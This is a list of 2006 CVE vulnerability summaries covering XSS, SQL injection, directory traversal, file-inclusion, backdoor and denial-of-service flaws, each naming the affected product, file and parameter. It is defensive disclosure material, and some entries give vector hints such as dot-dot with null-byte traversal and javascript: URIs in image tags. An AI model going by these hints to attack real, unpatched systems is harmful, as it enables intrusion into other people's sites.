[CVE-2006-0627] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0, 2.0a, and 3.0 allows remote attackers to inject arbitrary web script or HTML via the (1) Referer or (2) X-Forwarded-For headers in an HTTP request, which are not properly handled when the administrator accesses Site Stats.
[CVE-2006-0613] Unspecified vulnerability in Java Web Start after 1.0.1_02, as used in J2SE 5.0 Update 5 and earlier, allows remote attackers to obtain privileges via unspecified vectors involving untrusted applications.
[CVE-2006-0609] Cross-site scripting (XSS) vulnerability in add.php in Hinton Design phphd 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2006-0605] Multiple cross-site scripting (XSS) vulnerabilities in Unknown Domain Shoutbox 2005.07.21 allow remote attackers to inject arbitrary web script or HTML, possibly via the (1) Handle or (2) Message fields.
[CVE-2006-0603] Multiple cross-site scripting vulnerabilities in signed.php in Hinton Design phphg Guestbook 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) location, (2) website, or (3) message parameter.
[CVE-2006-0593] Cross-site scripting (XSS) vulnerability in PHP-Fusion before 6.00.304 allows remote attackers to inject arbitrary web script or HTML via the (1) shout_name field in shoutbox_panel.php and the (2) comments field in comments_include.php.
[CVE-2006-0577] Lexmark X1185 printer allows local users to gain SYSTEM privileges by navigating to the "Appearance" dialog and selecting the "Additional styles (skins) are available on the Lexmark web site" option, which launches a web browser that is running with SYSTEM privileges.
[CVE-2006-0574] Cross-site scripting (XSS) vulnerability in mime/handle.html in cPanel 10 allows remote attackers to inject arbitrary web script or HTML via the (1) file extension or (2) mime-type.
[CVE-2006-0573] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to (a) editquota.html or (b) dodelpop.html
[CVE-2006-0570] Multiple SQL injection vulnerabilities in phpstatus 1.0, when gpc_magic_quotes is disabled, allow remote attackers to execute arbitrary SQL commands and bypass authentication via (1) the username parameter in check.php and (2) unknown attack vectors in the administrative interface.
[CVE-2006-0569] Cross-site scripting (XSS) vulnerability in user_class.php in Papoo 2.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the username field during the registration of a new account. NOTE: the provenance of this information is unknown
[CVE-2006-0568] Cross-site scripting (XSS) vulnerability in throw.main in Outblaze allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2006-0567] Directory traversal vulnerability in Files Xaraya module before 0.5.1, when the Archive Directory field on the Modify Config page is blank, allows remote attackers to access files outside of the web root via ".." (dot dot) sequences.
[CVE-2006-0562] Cross-site scripting (XSS) vulnerability in problem.php in PluggedOut Blog 1.9.9c allows remote attackers to inject arbitrary web script or HTML via the data parameter.
[CVE-2006-0559] Format string vulnerability in the SMTP server for McAfee WebShield 4.5 MR2 and earlier allows remote attackers to execute arbitrary code via format strings in the domain name portion of a destination address, which are not properly handled when a bounce message is constructed.
[CVE-2006-0542] Multiple SQL injection vulnerabilities in config.php in NukedWeb GuestBookHost 2005.04.25 allow remote attackers to execute arbitrary SQL commands via the (1) email and (2) password parameters.
[CVE-2006-0541] Multiple cross-site scripting (XSS) vulnerabilities in Tachyon Vanilla Guestbook 1.0 beta allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "posting new messages."
[CVE-2006-0536] Cross-site scripting (XSS) vulnerability in neomail.pl in NeoMail 1.27 allows remote attackers to inject arbitrary web script or HTML via the sort parameter. NOTE: some sources say that the affected parameter is "date," but the demonstration URL shows that it is "sort".
[CVE-2006-0535] Multiple cross-site scripting (XSS) vulnerabilities in Community Server allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: this candidate does not contain any actionable or distinguishing information. Perhaps it should not be included in CVE. NOTE: the provenance of this information is unknown
[CVE-2006-0534] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in CyberShop Ultimate E-commerce allow remote attackers to inject arbitrary web script or HTML via the (1) ortak or (2) kat parameter.
[CVE-2006-0533] Cross-site scripting (XSS) vulnerability in webmailaging.cgi in cPanel allows remote attackers to inject arbitrary web script or HTML via the numdays parameter.
[CVE-2006-0532] Cross-site scripting (XSS) vulnerability in resultat.asp in SoftMaker Shop allows remote attackers to inject arbitrary web script or HTML via a strSok parameter containing a javascript: URI in an IMG SRC attribute.
[CVE-2006-0524] Cross-site scripting (XSS) vulnerability in ashnews.php in Derek Ashauer ashNews 0.83 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2006-0521] Cross-site scripting (XSS) vulnerability in results.php in BrowserCRM allows remote attackers to inject arbitrary web script or HTML via certain manipulations of the query parameter, as demonstrated using an IMG SRC tag.
[CVE-2006-0518] Cross-site scripting (XSS) vulnerability in index.php3 in SPIP 1.8.2-e and earlier and 1.9 Alpha 2 (5539) and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2006-0515] Cisco PIX/ASA 7.1.x before 7.1(2) and 7.0.x before 7.0(5), PIX 6.3.x before 6.3.5(112), and FWSM 2.3.x before 2.3(4) and 3.x before 3.1(7), when used with Websense/N2H2, allows remote attackers to bypass HTTP access restrictions by splitting the GET method of an HTTP request into multiple packets, which prevents the request from being sent to Websense for inspection, aka bugs CSCsc67612, CSCsc68472, and CSCsd81734.
[CVE-2006-0513] Directory traversal vulnerability in pkmslogout in Tivoli Web Server Plug-in 5.1.0.10 in Tivoli Access Manager (TAM) 5.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
[CVE-2006-0509] Multiple cross-site scripting (XSS) vulnerabilities in clients.php in Cerberus Helpdesk, possibly 2.7, allow remote attackers to inject arbitrary web script or HTML via (1) the contact_search parameter and (2) unspecified url fields.
[CVE-2006-0508] Easy CMS stores the images directory under the web document root with insufficient access control and browsing enabled, which allows remote attackers to list and possibly read images that are stored in that directory.
[CVE-2006-0506] Cross-site scripting (XSS) vulnerability in index.php in Nuked-klaN 1.7 allows remote attackers to inject arbitrary web script or HTML via the letter parameter.
[CVE-2006-0504] Unspecified vulnerability in MailEnable Enterprise Edition before 1.2 allows remote attackers to cause a denial of service (CPU utilization) by viewing "formatted quoted-printable emails" via webmail.
[CVE-2006-0501] Cross-site scripting (XSS) vulnerability in MyCO Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the Name field, when registering a user.
[CVE-2006-0500] MyCO Guestbook 1.0 stores the admin directory under the web document root with insufficient access control, which allows remote attackers to perform unspecified privileged actions by directly accessing files via a URL.
[CVE-2006-0499] Cross-site scripting (XSS) vulnerability in rlink.php in Rlink 1.0.0 module for phpBB allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0498] Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-0496] Cross-site scripting (XSS) vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding (Cascading Style Sheets) CSS property, which does not require that the style sheet have the same origin as the web page, as demonstrated by the compromise of a large number of LiveJournal accounts.
[CVE-2006-0495] Cross-site scripting (XSS) vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB (aka MyBulletinBoard) 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header ($url variable).
[CVE-2006-0493] Cross-site scripting (XSS) vulnerability in MG2 (formerly known as Minigal) 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the Name field in a comment associated with a picture.
[CVE-2006-0480] Cross-site scripting (XSS) vulnerability in the Articles module in sPaiz-Nuke allows remote attackers to inject arbitrary web script or HTML via the query parameter in the search file.
[CVE-2006-0478] CRE Loaded 6.15 allows remote attackers to perform privileged actions, including uploading and creating arbitrary files, via a direct request to files.php. NOTE: the vendor states "The initial announcement of this risk was made on our website... and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases. We strongly encourage users of CRE Loaded 6.x, osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify their installations at the earliest possible moment."
[CVE-2006-0473] Cross-site scripting (XSS) vulnerability in the bbcode function in weblog.php in my little homepage my little weblog, as last modified in April 2004, allows remote attackers to inject arbitrary Javascript via a javascript URI in BBcode link tags.
[CVE-2006-0470] Cross-site scripting (XSS) vulnerability in search.php in MyBulletinBoard (MyBB) 1.02 allows remote attackers to inject arbitrary web script or HTML via the (1) sortby and (2) sortordr parameters, which are not properly handled in a redirection.
[CVE-2006-0469] Cross-site scripting (XSS) vulnerability in UebiMiau 2.7.9, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag.
[CVE-2006-0466] Cross-site scripting (XSS) vulnerability in search.asp in Goldstag Content Management System allows remote attackers to inject arbitrary web script or HTML via the text parameter.
[CVE-2006-0465] Cross-site scripting (XSS) vulnerability in risultati_ricerca.php in active121 Site Manager allows remote attackers to inject arbitrary web script or HTML via the cerca parameter.
[CVE-2006-0463] Cross-site scripting (XSS) vulnerability in IdeoContent Manager allows remote attackers to inject arbitrary web script or HTML via the (1) goto_id parameter to index.php or (2) page parameter to news_full.php.
[CVE-2006-0461] Cross-site scripting (XSS) vulnerability in core.input.php in ExpressionEngine 1.4.1 allows remote attackers to inject arbitrary web script or HTML via HTTP_REFERER (referer).
[CVE-2006-0446] Unspecified vulnerability in WeBWorK 2.1.3 and 2.2-pre1 allows remote privileged attackers to execute arbitrary commands as the web server via unknown attack vectors.
[CVE-2006-0445] index.php in Phpclanwebsite 1.23.1 allows remote authenticated users to obtain the installation path by specifying an invalid file name to the uploader page, as demonstrated by "\", which will display the full path of uploader.php. NOTE: this might be the result of a file inclusion vulnerability.
[CVE-2006-0444] SQL injection vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.1 allows remote attackers to execute arbitrary SQL commands via the (1) par parameter in the post function on the forum page and possibly the (2) poll_id parameter on the poll page. NOTE: the poll_id vector can also allow resultant cross-site scripting (XSS) from an unquoted error message for invalid SQL syntax.
[CVE-2006-0443] Cross-site scripting (XSS) vulnerability in archive.php in CheesyBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) realname and (2) comment parameters, or (3) via a javascript URI in the url parameter, when adding a comment.
[CVE-2006-0442] Multiple cross-site scripting (XSS) vulnerabilities in usercp.php in MyBulletinBoard (MyBB) 1.02 allow remote attackers to inject arbitrary web script or HTML via the (1) notepad parameter in a notepad action and (2) signature parameter in an editsig action. NOTE: These are different attack vectors, and probably a different vulnerability, than CVE-2006-0218 and CVE-2006-0219.
[CVE-2006-0439] Text Rider 2.4 stores sensitive data in the data directory under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing data/userlist.txt.
[CVE-2006-0437] Cross-site scripting (XSS) vulnerability in admin_smilies.php in phpBB 2.0.19 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the (1) smile_url or (2) smile_emotion parameters, which bypasses a check for "<" and ">" characters.
[CVE-2006-0432] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 9.0, when an Administrator uses the WebLogic Administration Console to add custom security policies, causes incorrect policies to be created, which prevents the server from properly protecting JNDI resources.
[CVE-2006-0431] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 8.1 SP5 allows untrusted applications to obtain the server's SSL identity via unknown attack vectors.
[CVE-2006-0430] Certain configurations of BEA WebLogic Server and WebLogic Express 9.0, 8.1 through SP5, and 7.0 through SP6, when connection filters are enabled, cause the server to run more slowly, which makes it easier for remote attackers to cause a denial of service (server slowdown).
[CVE-2006-0429] BEA WebLogic Server and WebLogic Express 9.0 causes new security providers to appear active even if they have not been activated by a server reboot, which could cause an administrator to perform inappropriate, security-relevant actions.
[CVE-2006-0428] Unspecified vulnerability in BEA WebLogic Portal 8.1 SP3 through SP5, when using Web Services Remote Portlets (WSRP), allows remote attackers to access restricted web resources via crafted URLs.
[CVE-2006-0427] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 9.0 and 8.1 through SP5 allows malicious EJBs or servlet applications to decrypt system passwords, possibly by accessing functionality that should have been restricted.
[CVE-2006-0426] BEA WebLogic Server and WebLogic Express 8.1 through SP4, when configuration auditing is enabled and a password change occurs, stores the old and new passwords in cleartext in the DefaultAuditRecorder.log file, which could allow attackers to gain privileges.
[CVE-2006-0425] BEA WebLogic Portal 8.1 through SP4 allows remote attackers to obtain the source for a deployment descriptor file via unknown vectors.
[CVE-2006-0424] BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 allows remote authenticated guest users to read the server log and obtain sensitive configuration information.
[CVE-2006-0423] BEA WebLogic Portal 8.1 through SP3 stores the password for the RDBMS Authentication provider in cleartext in the config.xml file, which allows attackers to gain privileges.
[CVE-2006-0422] Multiple unspecified vulnerabilities in BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 allow remote attackers to access MBean attributes or cause an unspecified denial of service via unknown attack vectors.
[CVE-2006-0421] By design, BEA WebLogic Server and WebLogic Express 7.0 and 6.1, when creating multiple domains from the same WebLogic instance on the same machine, allows administrators of any created domain to access other created domains, which could allow administrators to gain privileges that were not intended.
[CVE-2006-0420] BEA WebLogic Server and WebLogic Express 8.1 through SP4 and 7.0 through SP6 does not properly handle when servlets use relative forwarding, which allows remote attackers to cause a denial of service (slowdown) via unknown attack vectors that cause "looping stack overflow errors."
[CVE-2006-0419] BEA WebLogic Server and WebLogic Express 9.0, 8.1 through SP5, and 7.0 through SP6 allows anonymous binds to the embedded LDAP server, which allows remote attackers to read user entries or cause a denial of service (unspecified) via a large number of connections.
[CVE-2006-0415] Cross-site scripting (XSS) vulnerability in index.php in SleeperChat 0.3f and earlier allows remote attackers to inject arbitrary web script or HTML via the pseudo parameter.
[CVE-2006-0409] Cross-site scripting (XSS) vulnerability in index.php in Pixelpost Photoblog 1.4.3 allows remote attackers to inject arbitrary web script or HTML via the "Add Comment" field in a comment popup.
[CVE-2006-0407] Cross-site scripting (XSS) vulnerability in post.php in AZ Bulletin Board (AZbb) 1.1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) nickname parameter and (2) an iframe tag in the topic parameter. NOTE: the original disclosure specified the name parameter, but a correction was later provided. NOTE: followup posts have both disputed and confirmed the original claim.
[CVE-2006-0404] Note-A-Day Weblog 2.2 stores sensitive data under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to archive/.phpass-admin, which contains encrypted passwords.
[CVE-2006-0387] Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.
[CVE-2006-0378] Cross-site scripting (XSS) vulnerability in Netrix X-Site Manager allows remote attackers to inject arbitrary web script or HTML via the product_id parameter, as originally demonstrated for a custom mp3players_details.php program. NOTE: the name of the affected program might be installation-dependent, but it has been identified as "product_details.php" by some sources.
[CVE-2006-0373] Cross-site scripting (XSS) vulnerability in register.aspx in Douran FollowWeb allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: the provenance of this information is unknown
[CVE-2006-0370] Noah Medling RCBlog 1.03 stores the data and config directories under the web root with insufficient access control, which allows remote attackers to view account names and MD5 password hashes.
[CVE-2006-0367] Unspecified vulnerability in Cisco CallManager 3.2 and earlier, 3.3 before 3.3(5)SR1, 4.0 before 4.0(2a)SR2c, and 4.1 before 4.1(3)SR2 allows remote authenticated users with read-only administrative privileges to obtain full administrative privileges via a "crafted URL on the CCMAdmin web page."
[CVE-2006-0366] Cross-site scripting (XSS) vulnerability in Phpclanwebsite (aka PCW) allows remote attackers to inject arbitrary web script or HTML via a javascript URI in a BBCode img tag.
[CVE-2006-0365] Cross-site scripting (XSS) vulnerability in XMB (aka extreme message board) allows remote attackers to inject arbitrary web script or HTML via JavaScript in the SRC attribute of an IMG element.
[CVE-2006-0364] Cross-site scripting (XSS) vulnerability in MyBulletinBoard (MyBB) allows remote attackers to inject arbitrary web script or HTML via a signature containing a JavaScript URI in the SRC attribute of an IMG element, in which the URI uses SGML numeric character references without trailing semicolons, as demonstrated by "javascript".
[CVE-2006-0361] Cross-site scripting (XSS) vulnerability in addcomment.php in Bit 5 Blog 8.01 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in an <a> tag in the comment parameter, which strips most tags but not <a>.
[CVE-2006-0354] Cisco IOS before 12.3-7-JA2 on Aironet Wireless Access Points (WAP) allows remote authenticated users to cause a denial of service (termination of packet passing or termination of client connections) by sending the management interface a large number of spoofed ARP packets, which creates a large ARP table that exhausts memory, aka Bug ID CSCsc16644.
[CVE-2006-0352] The default configuration of Fluffington FLog 1.01 installs users.0.dat under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (login credentials) via a direct request. NOTE: It was later reported that 1.1.2 is also affected.
[CVE-2006-0350] Cross-site scripting (XSS) vulnerability in eggblog 2.0 allows remote attackers to inject arbitrary web script or HTML via the message field to topic.php.
[CVE-2006-0346] Cross-site scripting (XSS) vulnerability in SaralBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via a website field in a new comment to view.php, which is not properly handled in the comment function in functions.php.
[CVE-2006-0341] Cross-site scripting (XSS) vulnerability in WCONSOLE.DLL in Rockliffe MailSite 5.x and 6.1.22 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2006-0336] Kerio WinRoute Firewall before 6.1.4 Patch 2 allows attackers to cause a denial of service (CPU consumption and hang) via unknown vectors involving "browsing the web".
[CVE-2006-0334] Cross-site scripting (XSS) vulnerability in search.php in My Amazon Store Manager 1.0 allows remote attackers to inject arbitrary web script or HTML via the Keywords parameter. NOTE: some sources claim that the affected parameter is "q", but the only public archive of the original researcher notification shows an XSS manipulation in "Keywords".
[CVE-2006-0333] Cross-site scripting (XSS) vulnerability in ar-blog 5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) month or (2) year parameter to index.php.
[CVE-2006-0330] Cross-site scripting (XSS) vulnerability in Gallery before 1.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving the user name (fullname).
[CVE-2006-0325] Etomite Content Management System 0.6, and possibly earlier versions, when downloaded from the web site in January 2006 after January 10, contains a back door in manager/includes/todo.inc.php, which allows remote attackers to execute arbitrary commands via the "cij" parameter.
[CVE-2006-0324] SQL injection vulnerability in WebspotBlogging 3.0 allows remote attackers to execute arbitrary SQL commands and bypass authentication via the username parameter to login.php.
[CVE-2006-0317] Cross-site scripting (XSS) vulnerability in rkrt_stats.php in RedKernel Referrer Tracker 1.1.0-3 allows remote attackers to inject arbitrary web script or HTML via a query string value as a GET, which is stored in the $QUERY_STRING variable. NOTE: the provenance of this information is unknown
[CVE-2006-0299] The E4X implementation in Mozilla Firefox before 1.5.0.1, Thunderbird 1.5 if running Javascript in mail, and SeaMonkey before 1.0 exposes the internal "AnyName" object to external interfaces, which allows multiple cooperating domains to exchange information in violation of the same origin restrictions.
[CVE-2006-0295] Mozilla Firefox 1.5, Thunderbird 1.5 if Javascript is enabled in mail, and SeaMonkey before 1.0 might allow remote attackers to execute arbitrary code via the QueryInterface method of the built-in Location and Navigator objects, which leads to memory corruption.
[CVE-2006-0265] Multiple unspecified vulnerabilities in Oracle Database server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.1 have unspecified impact and attack vectors, as identified by Oracle Vuln# (1) DB17 in the Oracle Text component and (2) DB18 in the Program Interface Network component. NOTE: details are unavailable from Oracle, but they have not publicly disputed a claim by a reliable independent researcher that states that DB17 involves SQL injection in the (a) VALIDATE_STATEMENT and BUILD_DML functions in CTXSYS.DRILOAD
[CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
[CVE-2006-0251] Cross-site scripting (XSS) vulnerability in fom.cgi in Faq-O-Matic 2.711 allows remote attackers to inject arbitrary web script or HTML via the (1) _duration, (2) file, and (3) cmd parameters.
[CVE-2006-0248] Virata-EmWeb web server 6_1_0, as used in (1) Intracom JetSpeed 500 and 520 and (2) Allied Data Technologies CopperJet 811 RouterPlus, allows remote attackers to access privileged information, such as user lists and configuration settings, via direct HTTP requests.
[CVE-2006-0247] Cross-site scripting (XSS) vulnerability in anyboard.cgi in Netbula Anyboard 9.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the tK parameter in a find command.
[CVE-2006-0246] Cross-site scripting (XSS) vulnerability in down.pl in Widexl Download Tracker 1.06 allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
[CVE-2006-0245] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.7-pl1 allow remote attackers to inject arbitrary web script or HTML via the (3) redir, (4) productId, (5) docId, (6) act, and (7) catId parameters in index.php.
[CVE-2006-0244] ** DISPUTED ** Directory traversal vulnerability in workspaces.php in phpXplorer 0.9.33 allows remote attackers to include arbitrary files via a .. (dot dot) and trailing null byte (%00) in the sShare parameter. NOTE: a followup post claims that this is not a vulnerability since the functionality of phpXplorer supports the upload of PHP files, which would not cross privilege boundaries since the PHP functionality would support read access outside the web root.
[CVE-2006-0243] Cross-site scripting (XSS) vulnerability in SMBCMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the text parameter, which is used by the "Search Site" field. NOTE: the provenance of this information is unknown
[CVE-2006-0242] Cross-site scripting vulnerability in index.php in PHP Fusebox 4.0.6 allows remote attackers to inject arbitrary web script or HTML via the fuseaction parameter.
[CVE-2006-0241] Cross-site scripting vulnerability in WBNews 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the Name field.
[CVE-2006-0239] Multiple cross-site scripting (XSS) vulnerabilities in Simple Blog 2.1 allow remote attackers to inject arbitrary web script or HTML via (1) a comment to comments.asp and (2) possibly certain other fields in unspecified scripts.
[CVE-2006-0237] Cross-site scripting (XSS) vulnerability in index.php in GTP iCommerce allows remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) subcat parameters. NOTE: the provenance of this information is unknown
[CVE-2006-0233] Cross-site scripting (XSS) vulnerability in functions.php in microBlog 2.0 RC-10 allows remote attackers to inject arbitrary web script and HTML via a javascript: URI in a [url] BBcode tag.
[CVE-2006-0232] Symantec Scan Engine 5.0.0.24, and possibly other versions before 5.1.0.7, stores sensitive log and virus definition files under the web root with insufficient access control, which allows remote attackers to obtain the information via direct requests.
[CVE-2006-0222] Cross-site scripting (XSS) vulnerability in fullview.php in AlstraSoft Template Seller Pro allows remote attackers to inject arbitrary web script or HTML via the tempid parameter.
[CVE-2006-0220] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 5.3 through 6.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the day parameter in calendar.php and (2) the input form in search.php. NOTE: the provenance of this information is unknown
[CVE-2006-0217] Multiple cross-site scripting (XSS) vulnerabilities in Ultimate Auction 3.67 allow remote attackers to inject arbitrary web script or HTML via the (1) item parameter in item.pl and (2) category parameter in itemlist.pl, which reflects the XSS in an error message. NOTE: the affected version might be wrong since the current version as of 20060116 is 3.6.1.
[CVE-2006-0215] Cross-site scripting (XSS) vulnerability in admin.php in QualityEBiz Quality PPC (QPPC) 1.0 build 1644 allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. NOTE: this issue might be resultant from CVE-2006-0216.
[CVE-2006-0211] Cross-site scripting (XSS) vulnerability in forgotPassword.asp in Helm Hosting Control Panel 3.2.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the txtEmailAddress parameter.
[CVE-2006-0210] Cross-site scripting (XSS) vulnerability in index.php in Interspire TrackPoint NX before 0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter when using the Login page.
[CVE-2006-0208] Multiple cross-site scripting (XSS) vulnerabilities in PHP 4.4.1 and 5.1.1, when display_errors and html_errors are on, allow remote attackers to inject arbitrary web script or HTML via inputs to PHP applications that are not filtered when they are included in the resulting error message.
[CVE-2006-0204] Multiple cross-site scripting (XSS) vulnerabilities in Wordcircle 2.17 allow remote attackers to inject arbitrary web script or HTML via (1) the "Course name" field in index.php when the frm parameter has the value "mine" and (2) possibly certain other fields in unspecified scripts.
[CVE-2006-0202] Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50 and possibly earlier has (1) world-readable permissions for ipn/logs/ipn_success.txt, which allows local users to view sensitive information (payment data), and (2) world-writable permissions for ipn/logs, which allows local users to delete or replace payment data.
[CVE-2006-0201] Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php.
[CVE-2006-0198] Cross-site scripting (XSS) vulnerability in a certain module, possibly poll or Pool, for XOOPS allows remote attackers to inject arbitrary web script or HTML via JavaScript in the SRC attribute of an IMG element in a comment.
[CVE-2006-0195] Interpretation conflict in the MagicHTML filter in SquirrelMail 1.4.0 to 1.4.5 allows remote attackers to conduct cross-site scripting (XSS) attacks via style sheet specifiers with invalid (1) "/*" and "*/" comments, or (2) a newline in a "url" specifier, which is processed by certain web browsers including Internet Explorer.
[CVE-2006-0194] Cross-site scripting (XSS) vulnerability in default.asp in FogBugz 4.029, and other versions before 4.0.33, allows remote attackers to inject arbitrary web script or HTML via the dest parameter in the pgLogon page.
[CVE-2006-0193] Cross-site scripting (XSS) vulnerability in the Hosting Control Panel (psoft.hsphere.CP) in Positive Software H-Sphere 2.4.3 Patch 8 and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter in a login action.
[CVE-2006-0188] webmail.php in SquirrelMail 1.4.0 to 1.4.5 allows remote attackers to inject arbitrary web pages into the right frame via a URL in the right_frame parameter. NOTE: this has been called a cross-site scripting (XSS) issue, but it is different than what is normally identified as XSS.
[CVE-2006-0185] Multiple cross-site scripting vulnerabilities in the (1) Pool or (2) News Modules in Php-Nuke allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag.
[CVE-2006-0180] Cross-site scripting (XSS) vulnerability in CaLogic Calendars 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the Title field on the "Adding New Event" page, and possibly other vectors, involving iframe tags.
[CVE-2006-0175] Cross-site scripting (XSS) vulnerability in search_form.asp in Web Wiz Forums 6.34 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2006-0172] Cross-site scripting (XSS) vulnerability in the file manager utility in Hummingbird Collaboration (aka Hummingbird Enterprise Collaboration) 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML in an uploaded page, which is published without a check for hostile scripting.
[CVE-2006-0171] PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE.
[CVE-2006-0168] Cross-site scripting (XSS) vulnerability in MyPhPim 01.05 allows remote attackers to inject arbitrary web script or HTML via the description field on the "Create New todo" page.
[CVE-2006-0165] Cross-site scripting (XSS) vulnerability in the DataForm Entries functionality in Plain Black WebGUI before 6.8.4 (gamma) allows remote attackers to inject arbitrary Javascript via the (1) url and (2) name field of the default email form.
[CVE-2006-0152] Cross-site scripting (XSS) in search_result.php in phpChamber 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the needle parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0149] Cross-site scripting (XSS) vulnerability in SimpBook 1.0, with html_enable on (the default), allows remote attackers to inject arbitrary web script or HTML via the message field.
[CVE-2006-0142] Cross-site scripting (XSS) vulnerability in andromeda.php in Andromeda 1.9.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the s parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0140] Cross-site scripting (XSS) vulnerability in post.php in NavBoard V16 Stable(2.6.0) and V17beta2 allows remote attackers to inject arbitrary web script or HTML via the (1) b, (2) textlarge, and (3) url bbcode tags.
[CVE-2006-0137] SQL injection vulnerability in linkcategory.php in Phanatic Softwares Chimera Web Portal System 0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2006-0136] Multiple cross-site scripting (XSS) vulnerabilities in the guestbook module in modules.php in Phanatic Softwares Chimera Web Portal System 0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) comment_poster, (2) comment_poster_email, (3) comment_poster_homepage, and (4) comment_text parameters.
[CVE-2006-0135] SQL injection vulnerability in login.php in TheWebForum (twf) 1.2.1 allows remote attackers to execute arbitrary SQL commands and bypass login authentication via the username parameter (aka the u variable).
[CVE-2006-0134] Cross-site scripting (XSS) vulnerability in register.php in TheWebForum (twf) 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the www parameter.
[CVE-2006-0132] Directory traversal vulnerability in webftp.php in SysCP WebFTP 1.2.6 and possibly earlier allows remote attackers to include and execute arbitrary local PHP scripts, and possibly read other types of files, via a .. (dot dot) and a trailing null in the webftp_language parameter.
[CVE-2006-0124] Cross-site scripting (XSS) vulnerability in crear.php in ADN Forum 1.0b allows remote attackers to inject arbitrary web script or HTML via the titulo parameter, which is used by the "Topic name" field.
[CVE-2006-0122] Cross-site scripting (XSS) vulnerability in Public/Index.asp in Aquifer CMS allows remote attackers to inject arbitrary web script or HTML via the Keyword parameter.
